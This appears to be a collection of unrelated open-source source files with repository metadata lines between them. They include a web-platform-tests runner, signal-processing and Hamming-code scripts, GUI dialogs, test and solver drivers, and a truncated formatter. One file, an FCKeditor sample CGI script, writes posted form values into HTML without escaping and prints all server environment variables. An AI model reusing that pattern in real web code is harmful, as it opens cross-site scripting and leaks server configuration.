test_loader = testloader.TestLoader(test_manifests,
kwargs["test_types"],
run_info,
manifest_filters=manifest_filters,
chunk_type=kwargs["chunk_type"],
total_chunks=kwargs["total_chunks"],
chunk_number=kwargs["this_chunk"],
include_https=ssl_enabled,
include_h2=h2_enabled,
include_quic=kwargs["enable_quic"],
skip_timeout=kwargs["skip_timeout"],
skip_implementation_status=kwargs["skip_implementation_status"],
chunker_kwargs=chunker_kwargs)
return run_info, test_loader
def list_test_groups(test_paths, product, **kwargs):
env.do_delayed_imports(logger, test_paths)
run_info_extras = products.load_product(kwargs["config"], product)[-1](**kwargs)
run_info, test_loader = get_loader(test_paths, product,
run_info_extras=run_info_extras, **kwargs)
for item in sorted(test_loader.groups(kwargs["test_types"])):
print(item)
def list_disabled(test_paths, product, **kwargs):
env.do_delayed_imports(logger, test_paths)
rv = []
run_info_extras = products.load_product(kwargs["config"], product)[-1](**kwargs)
run_info, test_loader = get_loader(test_paths, product,
run_info_extras=run_info_extras, **kwargs)
for test_type, tests in iteritems(test_loader.disabled_tests):
for test in tests:
rv.append({"test": test.id, "reason": test.disabled()})
print(json.dumps(rv, indent=2))
def list_tests(test_paths, product, **kwargs):
env.do_delayed_imports(logger, test_paths)
run_info_extras = products.load_product(kwargs["config"], product)[-1](**kwargs)
run_info, test_loader = get_loader(test_paths, product,
run_info_extras=run_info_extras, **kwargs)
for test in test_loader.test_ids:
print(test)
def get_pause_after_test(test_loader, **kwargs):
if kwargs["pause_after_test"] is None:
if kwargs["repeat_until_unexpected"]:
return False
if kwargs["headless"]:
return False
if kwargs["debug_test"]:
return True
tests = test_loader.tests
is_single_testharness = (sum(len(item) for item in itervalues(tests)) == 1 and
len(tests.get("testharness", [])) == 1)
if kwargs["repeat"] == 1 and kwargs["rerun"] == 1 and is_single_testharness:
return True
return False
return kwargs["pause_after_test"]
def run_tests(config, test_paths, product, **kwargs):
"""Set up the test environment, load the list of tests to be executed, and
invoke the remainder of the code to execute tests"""
mp = mpcontext.get_context()
if kwargs["instrument_to_file"] is None:
recorder = instruments.NullInstrument()
else:
recorder = instruments.Instrument(kwargs["instrument_to_file"])
with recorder as recording, capture.CaptureIO(logger,
not kwargs["no_capture_stdio"],
mp_context=mp):
recording.set(["startup"])
env.do_delayed_imports(logger, test_paths)
product = products.load_product(config, product, load_cls=True)
env_extras = product.get_env_extras(**kwargs)
product.check_args(**kwargs)
if kwargs["install_fonts"]:
env_extras.append(FontInstaller(
logger,
font_dir=kwargs["font_dir"],
ahem=os.path.join(test_paths["/"]["tests_path"], "fonts/Ahem.ttf")
))
recording.set(["startup", "load_tests"])
test_groups = (testloader.TestGroupsFile(logger, kwargs["test_groups_file"])
if kwargs["test_groups_file"] else None)
(test_source_cls,
test_source_kwargs,
chunker_kwargs) = testloader.get_test_src(logger=logger,
test_groups=test_groups,
**kwargs)
run_info, test_loader = get_loader(test_paths,
product.name,
run_info_extras=product.run_info_extras(**kwargs),
chunker_kwargs=chunker_kwargs,
test_groups=test_groups,
**kwargs)
logger.info("Using %i client processes" % kwargs["processes"])
skipped_tests = 0
test_total = 0
unexpected_total = 0
if len(test_loader.test_ids) == 0 and kwargs["test_list"]:
logger.critical("Unable to find any tests at the path(s):")
for path in kwargs["test_list"]:
logger.critical(" %s" % path)
logger.critical("Please check spelling and make sure there are tests in the specified path(s).")
return False
kwargs["pause_after_test"] = get_pause_after_test(test_loader, **kwargs)
ssl_config = {"type": kwargs["ssl_type"],
"openssl": {"openssl_binary": kwargs["openssl_binary"]},
"pregenerated": {"host_key_path": kwargs["host_key_path"],
"host_cert_path": kwargs["host_cert_path"],
"ca_cert_path": kwargs["ca_cert_path"]}}
testharness_timeout_multipler = product.get_timeout_multiplier("testharness",
run_info,
**kwargs)
mojojs_path = kwargs["mojojs_path"] if kwargs["enable_mojojs"] else None
recording.set(["startup", "start_environment"])
with env.TestEnvironment(test_paths,
testharness_timeout_multipler,
kwargs["pause_after_test"],
kwargs["debug_test"],
kwargs["debug_info"],
product.env_options,
ssl_config,
env_extras,
kwargs["enable_quic"],
mojojs_path) as test_environment:
recording.set(["startup", "ensure_environment"])
try:
test_environment.ensure_started()
except env.TestEnvironmentError as e:
logger.critical("Error starting test environment: %s" % e.message)
raise
recording.set(["startup"])
repeat = kwargs["repeat"]
repeat_count = 0
repeat_until_unexpected = kwargs["repeat_until_unexpected"]
while repeat_count < repeat or repeat_until_unexpected:
repeat_count += 1
if repeat_until_unexpected:
logger.info("Repetition %i" % (repeat_count))
elif repeat > 1:
logger.info("Repetition %i / %i" % (repeat_count, repeat))
test_count = 0
unexpected_count = 0
tests = []
for test_type in test_loader.test_types:
tests.extend(test_loader.tests[test_type])
try:
test_groups = test_source_cls.tests_by_group(tests, **test_source_kwargs)
except Exception:
logger.critical("Loading tests failed")
return False
logger.suite_start(test_groups,
name='web-platform-test',
run_info=run_info,
extra={"run_by_dir": kwargs["run_by_dir"]})
for test_type in kwargs["test_types"]:
logger.info("Running %s tests" % test_type)
# WebDriver tests may create and destroy multiple browser
# processes as part of their expected behavior. These
# processes are managed by a WebDriver server binary. This
# obviates the need for wptrunner to provide a browser, so
# the NullBrowser is used in place of the "target" browser
if test_type == "wdspec":
browser_cls = NullBrowser
else:
browser_cls = product.browser_cls
browser_kwargs = product.get_browser_kwargs(logger,
test_type,
run_info,
config=test_environment.config,
num_test_groups=len(test_groups),
**kwargs)
executor_cls = product.executor_classes.get(test_type)
executor_kwargs = product.get_executor_kwargs(logger,
test_type,
test_environment.config,
test_environment.cache_manager,
run_info,
**kwargs)
if executor_cls is None:
logger.error("Unsupported test type %s for product %s" %
(test_type, product.name))
continue
for test in test_loader.disabled_tests[test_type]:
logger.test_start(test.id)
logger.test_end(test.id, status="SKIP")
skipped_tests += 1
if test_type == "testharness":
run_tests = {"testharness": []}
for test in test_loader.tests["testharness"]:
if ((test.testdriver and not executor_cls.supports_testdriver) or
(test.jsshell and not executor_cls.supports_jsshell)):
logger.test_start(test.id)
logger.test_end(test.id, status="SKIP")
skipped_tests += 1
else:
run_tests["testharness"].append(test)
else:
run_tests = test_loader.tests
recording.pause()
with ManagerGroup("web-platform-tests",
kwargs["processes"],
test_source_cls,
test_source_kwargs,
browser_cls,
browser_kwargs,
executor_cls,
executor_kwargs,
kwargs["rerun"],
kwargs["pause_after_test"],
kwargs["pause_on_unexpected"],
kwargs["restart_on_unexpected"],
kwargs["debug_info"],
not kwargs["no_capture_stdio"],
recording=recording) as manager_group:
try:
manager_group.run(test_type, run_tests)
except KeyboardInterrupt:
logger.critical("Main thread got signal")
manager_group.stop()
raise
test_count += manager_group.test_count()
unexpected_count += manager_group.unexpected_count()
recording.set(["after-end"])
test_total += test_count
unexpected_total += unexpected_count
logger.info("Got %i unexpected results" % unexpected_count)
logger.suite_end()
if repeat_until_unexpected and unexpected_total > 0:
break
if repeat_count == 1 and len(test_loader.test_ids) == skipped_tests:
break
if test_total == 0:
if skipped_tests > 0:
logger.warning("All requested tests were skipped")
else:
if kwargs["default_exclude"]:
logger.info("No tests ran")
return True
else:
logger.critical("No tests ran")
return False
if unexpected_total and not kwargs["fail_on_unexpected"]:
logger.info("Tolerating %s unexpected results" % unexpected_total)
return True
return unexpected_total == 0
def check_stability(**kwargs):
from . import stability
if kwargs["stability"]:
logger.warning("--stability is deprecated; please use --verify instead!")
kwargs['verify_max_time'] = None
kwargs['verify_chaos_mode'] = False
kwargs['verify_repeat_loop'] = 0
kwargs['verify_repeat_restart'] = 10 if kwargs['repeat'] == 1 else kwargs['repeat']
kwargs['verify_output_results'] = True
return stability.check_stability(logger,
max_time=kwargs['verify_max_time'],
chaos_mode=kwargs['verify_chaos_mode'],
repeat_loop=kwargs['verify_repeat_loop'],
repeat_restart=kwargs['verify_repeat_restart'],
output_results=kwargs['verify_output_results'],
**kwargs)
def start(**kwargs):
assert logger is not None
logged_critical = wptlogging.LoggedAboveLevelHandler("CRITICAL")
handler = handlers.LogLevelFilter(logged_critical, "CRITICAL")
logger.add_handler(handler)
rv = False
try:
if kwargs["list_test_groups"]:
list_test_groups(**kwargs)
elif kwargs["list_disabled"]:
list_disabled(**kwargs)
elif kwargs["list_tests"]:
list_tests(**kwargs)
elif kwargs["verify"] or kwargs["stability"]:
rv = check_stability(**kwargs) or logged_critical.has_log
else:
rv = not run_tests(**kwargs) or logged_critical.has_log
finally:
logger.remove_handler(handler)
return rv
def main():
"""Main entry point when calling from the command line"""
kwargs = wptcommandline.parse_args()
try:
if kwargs["prefs_root"] is None:
kwargs["prefs_root"] = os.path.abspath(os.path.join(here, "prefs"))
setup_logging(kwargs, {"raw": sys.stdout})
return start(**kwargs)
except Exception:
if kwargs["pdb"]:
import pdb
import traceback
print(traceback.format_exc())
pdb.post_mortem()
else:
raise
| mpl-2.0 |
boddmg/dsp-playground | experiment.py | 1 | 2717 | from matplotlib import pyplot as plt
import numpy as np
import math
import pickle
from scipy import signal
from numpy.fft import rfft, irfft
from numpy import argmax, sqrt, mean, absolute, arange, log10
from scipy.signal import blackmanharris
import thdn
def single_frequency_filter(input_signal):
y_f_all = np.fft.fft(input_signal)
y_f_all[:1] = np.array([0] *1)
y_f_half = y_f_all[:len(y_f_all) / 2]
y_f_abs = np.abs(y_f_half)
y_f_max = max(y_f_abs)
y_f_max_index = np.where(y_f_abs == y_f_max)[0][0]
print(y_f_max_index)
y_f_all[:y_f_max_index] = [0] * (y_f_max_index)
y_f_all[y_f_max_index+1:] = [0] * (len(y_f_all)-y_f_max_index-1)
y_filtered = np.fft.ifft(y_f_all)
return y_filtered
FS = 204.8
BASE_FREQUENCY = 50.0
FILTER_SAMPLE_PURE = int(2*1/BASE_FREQUENCY * FS) # 2T
FILTER_SAMPLE_ALL = 2048
DF = FS/FILTER_SAMPLE_ALL
print(DF)
filter_buffer = []
def single_filter(x):
return x
def main():
import json
# get data
data = json.load(open("data.txt", "r"))
# y = np.concatenate((np.load("data.pkl")[:256], np.array([0] * (600 - 256))))
# y = np.concatenate((np.load("data.pkl")[:], [0]*6000))
y = np.array(data["Y"])
# y = signal.resample(y, 5000)
# fs = 5000.0 * (10000/200)
fs = 1 / data["dt"]
print("fs:\t", fs)
time = len(y)/fs # in seconds
x = np.arange(0, time, 1/fs)
# x = x[:-1]
# for i in meta_data:
# print(i, meta_data[i])
print("time",time)
end = 40
f = x[:end]
f = f * fs / time
# Add the noise
# y = y.clip(-10, 7)
# y += (np.sin(x * 5) * 2).clip (-0.3, 0.8)
# y += np.random.uniform(size=len(y))
plt.subplot(231)
plt.plot(x, y, 'r')
plt.subplot(232)
y_filtered = y.tolist()
y_list = y.tolist()
for i in range(len(y_list)):
y_filtered[i] = single_filter(y_list[i])
y_filtered = np.array(y_filtered)
# y_filtered = single_frequency_filter(y)*10
# filter_function = np.array(([0] * 6 + [1] + [0] * (600 - 7)))
# filter_function = np.fft.ifft(filter_function)
# y_filtered = np.fft.ifft(y_f * filter_function)
# y_filtered = np.convolve(y_filtered, filter_function, mode='same')
# y_filtered = np.sin(x*np.pi*2* )*10
plt.plot(x, y_filtered, "b")
plt.subplot(233)
plt.plot(x[:end], y[:end], "r", x[:end], y_filtered[:end], "b")
plt.subplot(234)
y = np.abs(np.fft.fft(y))
y = y[:end]
plt.plot(f, y)
plt.subplot(235)
y_filtered = np.abs(np.fft.fft(y_filtered))
y_filtered = y_filtered[:end]
plt.plot(f, y_filtered)
plt.subplot(236)
plt.plot(f, y, 'r', f, y_filtered, 'b')
plt.show()
if __name__ == '__main__':
main()
| mit |
sidzan/netforce | netforce_general/netforce_general/set_module_version.py | 2 | 1178 | # Copyright (c) 2012-2015 Netforce Co. Ltd.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
# OR OTHER DEALINGS IN THE SOFTWARE.
from netforce import set_module_version
set_module_version("3.1.0",115)
| mit |
farra/apachecon-consite | public/javascripts/fckeditor/_samples/py/sampleposteddata.py | 1 | 2067 | #!/usr/bin/env python
"""
FCKeditor - The text editor for Internet - http://www.fckeditor.net
Copyright (C) 2003-2007 Frederico Caldeira Knabben
== BEGIN LICENSE ==
Licensed under the terms of any of the following licenses at your
choice:
- GNU General Public License Version 2 or later (the "GPL")
http://www.gnu.org/licenses/gpl.html
- GNU Lesser General Public License Version 2.1 or later (the "LGPL")
http://www.gnu.org/licenses/lgpl.html
- Mozilla Public License Version 1.1 or later (the "MPL")
http://www.mozilla.org/MPL/MPL-1.1.html
== END LICENSE ==
This page lists the data posted by a form.
"""
import cgi
import os
# Tell the browser to render html
print "Content-Type: text/html"
print ""
try:
# Create a cgi object
form = cgi.FieldStorage()
except Exception, e:
print e
# Document header
print """<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>FCKeditor - Samples - Posted Data</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex, nofollow">
<link href="../sample.css" rel="stylesheet" type="text/css" />
</head>
<body>
"""
# This is the real work
print """
<h1>FCKeditor - Samples - Posted Data</h1>
This page lists all data posted by the form.
<hr>
<table width="100%" border="1" cellspacing="0" bordercolor="#999999">
<tr style="FONT-WEIGHT: bold; COLOR: #dddddd; BACKGROUND-COLOR: #999999">
<td nowrap>Field Name </td>
<td>Value</td>
</tr>
"""
for key in form.keys():
try:
value = form[key].value
print """
<tr>
<td valign="top" nowrap><b>%s</b></td>
<td width="100%%" style="white-space:pre">%s</td>
</tr>
""" % (key, value)
except Exception, e:
print e
print "</table>"
# For testing your environments
print "<hr>"
for key in os.environ.keys():
print "%s: %s<br>" % (key, os.environ.get(key, ""))
print "<hr>"
# Document footer
print """
</body>
</html>
"""
| mit |
Akson/RemoteConsolePlus3 | RemoteConsolePlus3/RCP3/Backends/Sources/ZMQ/Tools/UI.py | 1 | 5885 | #Created by Dmytro Konobrytskyi, 2013 (github.com/Akson)
import wx
from RCP3.Backends.Sources.ZMQ.Tools.RoutersListProvider import GetAvailableRoutersList
class ServerSelectionDialog(wx.Dialog):
def __init__(self, currentServerAddress = None):
super(ServerSelectionDialog, self).__init__(parent=None, size=(270, 260))
self._originalServerAddress = currentServerAddress
self.serverAddress = currentServerAddress
self.availableServersList = GetAvailableRoutersList()
self.currentlySelectedIdx = -1
self.InitUI()
self.SetTitle("Select router address")
def InitUI(self):
vbox = wx.BoxSizer(wx.VERTICAL)
hbox = wx.BoxSizer(wx.HORIZONTAL)
hbox.Add(wx.StaticText(self, label='Router address:'), flag=wx.ALIGN_CENTER_VERTICAL)
self.addressTextCtrl = wx.TextCtrl(self)
self.addressTextCtrl.SetValue(self.serverAddress if self.serverAddress else "")
hbox.Add(self.addressTextCtrl, proportion=1, flag=wx.ALIGN_CENTER_VERTICAL|wx.LEFT|wx.EXPAND, border=5)
vbox.Add(hbox, flag=wx.ALL|wx.EXPAND, border=5)
hbox = wx.BoxSizer(wx.HORIZONTAL)
self.listBox = wx.ListBox(self, wx.NewId(), wx.DefaultPosition, (-1, 150), self.availableServersList, wx.LB_SINGLE)
hbox.Add(self.listBox, proportion=1, flag=wx.EXPAND)
vbox.Add(hbox, flag=wx.ALL|wx.EXPAND, border=5)
hbox = wx.BoxSizer(wx.HORIZONTAL)
okButton = wx.Button(self, label='Ok')
closeButton = wx.Button(self, label='Close')
refreshButton = wx.Button(self, label='Refresh list')
hbox.Add(okButton)
hbox.Add(closeButton, flag=wx.LEFT, border=5)
hbox.Add(refreshButton, flag=wx.LEFT, border=10)
vbox.Add(hbox, flag=wx.ALIGN_CENTER|wx.TOP|wx.BOTTOM, border=5)
self.SetSizer(vbox)
okButton.Bind(wx.EVT_BUTTON, self.SaveNewAddresAndClose)
closeButton.Bind(wx.EVT_BUTTON, self.RestoreOriginalAndClose)
refreshButton.Bind(wx.EVT_BUTTON, self.RefreshRoutersList)
self.Bind(wx.EVT_CLOSE, self.RestoreOriginalAndClose)
self.listBox.Bind(wx.EVT_LISTBOX, self.OnSelect)
self.addressTextCtrl.Bind(wx.EVT_TEXT, self.OnText)
def OnText(self, event):
if self.availableServersList[self.currentlySelectedIdx] != self.addressTextCtrl.GetValue():
self.currentlySelectedIdx = -1
self.listBox.Select(self.currentlySelectedIdx)
def OnSelect(self, event):
self.currentlySelectedIdx = event.GetSelection()
self.addressTextCtrl.SetValue(self.availableServersList[event.GetSelection()])
self.listBox.Select(self.currentlySelectedIdx)
def RefreshRoutersList(self, e=None):
self.availableServersList = GetAvailableRoutersList()
self.listBox.Set(self.availableServersList)
self.listBox.Select(self.currentlySelectedIdx)
def SaveNewAddresAndClose(self, e):
self.serverAddress = self.addressTextCtrl.GetValue()
self.Destroy()
def RestoreOriginalAndClose(self, e):
self.serverAddress = self._originalServerAddress
self.Destroy()
class StreamsSelectionDialog(wx.Dialog):
def __init__(self, currentServerAddress, currentStreams = []):
super(StreamsSelectionDialog, self).__init__(parent=None, size=(670, 360))
self.serverAddress = currentServerAddress
self._originalStreams = currentStreams
self.streamsList = currentStreams
self.currentlySelectedIdx = -1
self.InitUI()
self.SetTitle("Select listening streams for "+self.serverAddress)
def InitUI(self):
vbox = wx.BoxSizer(wx.VERTICAL)
hbox = wx.BoxSizer(wx.HORIZONTAL)
hbox.Add(wx.StaticText(self, label='Stream name:'), flag=wx.ALIGN_CENTER_VERTICAL)
self.addressTextCtrl = wx.TextCtrl(self)
self.addressTextCtrl.SetValue("")
hbox.Add(self.addressTextCtrl, proportion=1, flag=wx.ALIGN_CENTER_VERTICAL|wx.LEFT|wx.EXPAND, border=5)
addButton = wx.Button(self, label='Add')
hbox.Add(addButton, flag=wx.ALIGN_CENTER_VERTICAL|wx.LEFT|wx.EXPAND, border=5)
vbox.Add(hbox, flag=wx.ALL|wx.EXPAND, border=5)
hbox = wx.BoxSizer(wx.HORIZONTAL)
self.listBox = wx.ListBox(self, wx.NewId(), wx.DefaultPosition, (-1, 250), self.streamsList, wx.LB_SINGLE)
hbox.Add(self.listBox, proportion=1, flag=wx.EXPAND)
vbox.Add(hbox, flag=wx.ALL|wx.EXPAND, border=5)
hbox = wx.BoxSizer(wx.HORIZONTAL)
okButton = wx.Button(self, label='Ok')
closeButton = wx.Button(self, label='Close')
hbox.Add(okButton)
hbox.Add(closeButton, flag=wx.LEFT, border=5)
vbox.Add(hbox, flag=wx.ALIGN_CENTER|wx.TOP|wx.BOTTOM, border=5)
self.SetSizer(vbox)
okButton.Bind(wx.EVT_BUTTON, self.SaveAndClose)
closeButton.Bind(wx.EVT_BUTTON, self.RestoreOriginalAndClose)
addButton.Bind(wx.EVT_BUTTON, self.OnAddButton)
self.Bind(wx.EVT_CLOSE, self.RestoreOriginalAndClose)
self.listBox.Bind(wx.EVT_KEY_DOWN, self.OnKeyPress)
self.listBox.Bind(wx.EVT_LISTBOX, self.OnSelect)
def OnSelect(self, event):
self.currentlySelectedIdx = event.GetSelection()
def OnAddButton(self, e):
self.listBox.Append(self.addressTextCtrl.GetValue())
pass
def SaveAndClose(self, e):
self.streamsList = self.listBox.GetStrings()
self.Destroy()
def RestoreOriginalAndClose(self, e):
self.streamsList = self._originalStreams
self.Destroy()
def OnKeyPress(self, evt):
if evt.GetKeyCode() == wx.WXK_DELETE:
if self.currentlySelectedIdx!=-1:
self.listBox.Delete(self.currentlySelectedIdx) | lgpl-3.0 |
imrandomizer/Algorithm-Implementations | Hamming_Code/Python/AlexMathew/HammingCode.py | 27 | 1830 | """
AUTHOR : Alex Mathew
EMAIL : [email protected]
There is a lot I can do to improve this implementation.
"""
"""For a given binary word, print out its corresponding Hamming Coded word"""
import math
def FindKeyBits(n):
keyBits=[]
pad = int(math.ceil(math.log(n)/math.log(2)))
for i in xrange(1, n+1):
b = "{0:b}".format(i)
b=b.zfill(pad)
keyBits.append(b)
return keyBits
def IsPowerOf2(x):
return ((x&(x-1))==0)
def XOR(a, b):
return str(int(a)^int(b))
def FindParityCount(m):
r = math.ceil((math.log(m)/math.log(2))+1)
return int(r)
def CalculateParity(keyBits, data, parityTrack):
parity = '0'
pbCount = 0
for elem in keyBits:
if not IsPowerOf2(int(elem,2)):
if elem[-parityTrack]=='1':
parity = XOR(parity, data[pbCount-int(elem,2)])
else:
pbCount+=1
return parity
def ComputeHamming(data):
dataLen = len(data)
parityCount = FindParityCount(dataLen)
hammingLen = dataLen + parityCount
keyBits = FindKeyBits(hammingLen)
hammingCode = []
dataTrack = -1
parityTrack = 1
for i in xrange(1, hammingLen+1):
if IsPowerOf2(i):
parity = CalculateParity(keyBits, data, parityTrack)
hammingCode.append(parity)
parityTrack+=1
else:
hammingCode.append(data[dataTrack])
dataTrack-=1
hammingCode.reverse()
for i in hammingCode:
print i,
def main():
print 'The inputs are passed into the HammingCode() function as a string \n'
print '\nSample runs - '
print '\n\nINPUT : 1101'
print 'OUTPUT : '
ComputeHamming('1101')
print '\n\nINPUT : 11011101'
print 'OUTPUT : '
ComputeHamming('11011101')
print '\n\n'
data = raw_input("Enter the word to be encoded : ")
print '\nThe Hamming encoded word for', data, 'is : ',
ComputeHamming(data)
if __name__ == '__main__':
main() | mit |
nachandr/cfme_tests | cfme/tests/perf/workloads/test_idle.py | 2 | 2619 | """Runs Idle Workload by resetting appliance and enabling specific roles with no providers."""
import time
import pytest
from cfme.utils.conf import cfme_performance
from cfme.utils.grafana import get_scenario_dashboard_urls
from cfme.utils.log import logger
from cfme.utils.smem_memory_monitor import add_workload_quantifiers
from cfme.utils.smem_memory_monitor import SmemMemoryMonitor
from cfme.utils.workloads import get_idle_scenarios
def pytest_generate_tests(metafunc):
argvalues = [[scenario] for scenario in get_idle_scenarios()]
idlist = [scenario['name'] for scenario in get_idle_scenarios()]
metafunc.parametrize(['scenario'], argvalues, ids=idlist)
@pytest.mark.usefixtures('generate_version_files')
def test_idle(appliance, request, scenario):
"""Runs an appliance at idle with specific roles turned on for specific amount of time. Memory
Monitor creates graphs and summary at the end of the scenario.
Polarion:
assignee: rhcf3_machine
casecomponent: CandU
initialEstimate: 1/4h
"""
from_ts = int(time.time() * 1000)
logger.debug('Scenario: {}'.format(scenario['name']))
appliance.clean_appliance()
quantifiers = {}
scenario_data = {'appliance_ip': appliance.hostname,
'appliance_name': cfme_performance['appliance']['appliance_name'],
'test_dir': 'workload-idle',
'test_name': 'Idle with {} Roles'.format(scenario['name']),
'appliance_roles': ', '.join(scenario['roles']),
'scenario': scenario}
monitor_thread = SmemMemoryMonitor(appliance.ssh_client(), scenario_data)
def cleanup_workload(from_ts, quantifiers, scenario_data):
starttime = time.time()
to_ts = int(starttime * 1000)
g_urls = get_scenario_dashboard_urls(scenario, from_ts, to_ts)
logger.debug('Started cleaning up monitoring thread.')
monitor_thread.grafana_urls = g_urls
monitor_thread.signal = False
monitor_thread.join()
add_workload_quantifiers(quantifiers, scenario_data)
timediff = time.time() - starttime
logger.info(f'Finished cleaning up monitoring thread in {timediff}')
request.addfinalizer(lambda: cleanup_workload(from_ts, quantifiers, scenario_data))
monitor_thread.start()
appliance.wait_for_miq_server_workers_started(poll_interval=2)
appliance.update_server_roles({role: True for role in scenario['roles']})
s_time = scenario['total_time']
logger.info(f'Idling appliance for {s_time}s')
time.sleep(s_time)
quantifiers['Elapsed_Time'] = s_time
logger.info('Test Ending...')
| gpl-2.0 |
optimizers/nlpy | nlpy/optimize/solvers/nlpy_funnel.py | 3 | 5078 | #!/usr/bin/env python
from nlpy import __version__
from nlpy.model import AmplModel
from nlpy.optimize.solvers.funnel import Funnel, LSTRFunnel, LDFPFunnel, \
StructuredLDFPFunnel
from nlpy.tools.timing import cputime
from optparse import OptionParser
import numpy
import nlpy.tools.logs
import sys, logging, os
# Create root logger.
log = logging.getLogger('funnel')
log.setLevel(logging.INFO)
fmt = logging.Formatter('%(name)-15s %(levelname)-8s %(message)s')
hndlr = logging.StreamHandler(sys.stdout)
hndlr.setFormatter(fmt)
log.addHandler(hndlr)
# Configure the solver logger.
sublogger = logging.getLogger('funnel.solver')
sublogger.setLevel(logging.INFO)
sublogger.addHandler(hndlr)
sublogger.propagate = False
def pass_to_funnel(nlp, **kwargs):
verbose = (kwargs['print_level'] == 2)
qn = kwargs.pop('quasi_newton')
t = cputime()
if qn:
funn = StructuredLDFPFunnel(nlp, logger_name='funnel.solver', **kwargs)
# funn = LDFPFunnel(nlp, logger_name='funnel.solver', **kwargs)
else:
funn = Funnel(nlp, logger_name='funnel.solver', **kwargs)
t_setup = cputime() - t # Setup time.
funn.solve() #reg=1.0e-8)
return (t_setup, funn)
usage_msg = """%prog [options] problem1 [... problemN]
where problem1 through problemN represent unconstrained nonlinear programs."""
# Define allowed command-line options
parser = OptionParser(usage=usage_msg, version='%prog version ' + __version__)
parser.add_option("-p", "--stop_p", action="store", type="float",
default=1.0e-5, dest="stop_p",
help="Primal stopping tolerance")
parser.add_option("-d", "--stop_d", action="store", type="float",
default=1.0e-5, dest="stop_d",
help="Dual stopping tolerance")
parser.add_option("-q", "--quasi_newton", action="store_true",
default=False, dest="quasi_newton",
help="Use LDFP approximation of Hessian")
parser.add_option("-i", "--iter", action="store", type="int", default=None,
dest="maxit", help="Specify maximum number of iterations")
parser.add_option("-o", "--print_level", action="store", type="int",
default=0, dest="print_level",
help="Print iterations detail (0, 1 or 2)")
# Parse command-line options
(options, args) = parser.parse_args()
# Translate options to input arguments.
opts = {}
if options.maxit is not None:
opts['maxit'] = options.maxit
opts['stop_p'] = options.stop_p
opts['stop_d'] = options.stop_d
opts['quasi_newton'] = options.quasi_newton
opts['print_level'] = options.print_level
# Set printing standards for arrays
numpy.set_printoptions(precision=3, linewidth=80, threshold=10, edgeitems=3)
multiple_problems = len(args) > 1
error = False
if multiple_problems:
# Define formats for output table.
hdrfmt = '%-10s %5s %5s %15s %7s %7s %6s %6s %5s'
hdr = hdrfmt % ('Name','Iter','Feval','Objective','dResid','pResid',
'Setup','Solve','Opt')
lhdr = len(hdr)
fmt = '%-10s %5d %5d %15.8e %7.1e %7.1e %6.2f %6.2f %5s'
log.info(hdr)
log.info('-' * lhdr)
# Solve each problem in turn.
for ProblemName in args:
nlp = AmplModel(ProblemName)
# Check for equality-constrained problem.
n_ineq = nlp.nlowerC + nlp.nupperC + nlp.nrangeC
if nlp.nbounds > 0 or n_ineq > 0:
msg = '%s has %d bounds and %d inequality constraints\n'
log.error(msg % (nlp.name, nlp.nbounds, n_ineq))
error = True
else:
ProblemName = os.path.basename(ProblemName)
if ProblemName[-3:] == '.nl':
ProblemName = ProblemName[:-3]
t_setup, funn = pass_to_funnel(nlp, **opts)
if multiple_problems:
log.info(fmt % (ProblemName, funn.niter, funn.nlp.feval, funn.f,
funn.dResid, funn.pResid,
t_setup, funn.tsolve, funn.optimal))
nlp.close() # Close model.
if not multiple_problems and not error:
# Output final statistics
log.info('--------------------------------')
log.info('Funnel: End of Execution')
log.info(' Problem : %-s' % ProblemName)
log.info(' Number of variables : %-d' % nlp.n)
log.info(' Number of linear constraints : %-d' % nlp.nlin)
log.info(' Number of general constraints: %-d' % (nlp.m - nlp.nlin))
log.info(' Initial/Final Objective : %-g/%-g' % (funn.f0, funn.f))
log.info(' Number of iterations : %-d' % funn.niter)
log.info(' Number of function evals : %-d' % funn.nlp.feval)
log.info(' Number of gradient evals : %-d' % funn.nlp.geval)
#log.info(' Number of Hessian evals : %-d' % funn.nlp.Heval)
log.info(' Number of Hessian matvecs : %-d' % funn.nlp.Hprod)
log.info(' Setup/Solve time : %-gs/%-gs' % (t_setup, funn.tsolve))
log.info(' Total time : %-gs' % (t_setup + funn.tsolve))
log.info('--------------------------------')
| gpl-3.0 |
MostlyOpen/odoo_addons | myo_document/models/document_seq.py | 1 | 3257 | # -*- coding: utf-8 -*-
###############################################################################
#
# Copyright (C) 2013-Today Carlos Eduardo Vercelino - CLVsol
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
from openerp import api, fields, models
from datetime import *
def format_code(code_seq):
code = map(int, str(code_seq))
code_len = len(code)
while len(code) < 14:
code.insert(0, 0)
while len(code) < 16:
n = sum([(len(code) + 1 - i) * v for i, v in enumerate(code)]) % 11
if n > 1:
f = 11 - n
else:
f = 0
code.append(f)
code_str = "%s.%s.%s.%s.%s-%s" % (str(code[0]) + str(code[1]),
str(code[2]) + str(code[3]) + str(code[4]),
str(code[5]) + str(code[6]) + str(code[7]),
str(code[8]) + str(code[9]) + str(code[10]),
str(code[11]) + str(code[12]) + str(code[13]),
str(code[14]) + str(code[15]))
if code_len <= 3:
code_form = code_str[18 - code_len:21]
